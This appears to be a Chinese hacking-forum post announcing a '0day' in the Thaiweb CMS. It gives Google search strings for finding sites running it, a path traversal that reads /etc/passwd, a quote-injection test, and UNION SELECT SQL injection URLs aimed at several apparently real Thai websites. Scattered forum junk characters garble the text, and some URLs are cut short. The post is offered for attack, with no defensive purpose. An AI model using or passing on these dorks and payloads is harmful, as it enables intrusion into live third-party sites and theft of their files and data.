Thaiweb远程文件sql注入漏洞0day

admin

Google之:

' v+ a4 x, d% Q* A8 Dintext:powered by Thaiweb
+ W  b% B7 k0 [* @( A& W1 _) K
inurl:index.php?page=board.php
8 r! p1 S3 {0 T9 H7 u8 \: v7 P

+ G7 h) N! L2 C! m& H
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
( S- N' q' V$ S# V. u# X4 o
4 O/ ]5 B9 i8 s  U( j$ z' U

利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'


+ R' D/ K$ i/ j+ s" x$ Z9 h
  ~$ r, F  i% [0 ^4 b+ i& ]4 fhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
8 T& E) _3 T* ^# Q* c# h- n
8 q' q$ f. m( o% o) e2 X9 j  X* Khttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

, V3 a4 b" A; Y' B2 ?http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
/ X  c: `% c" H0 }: u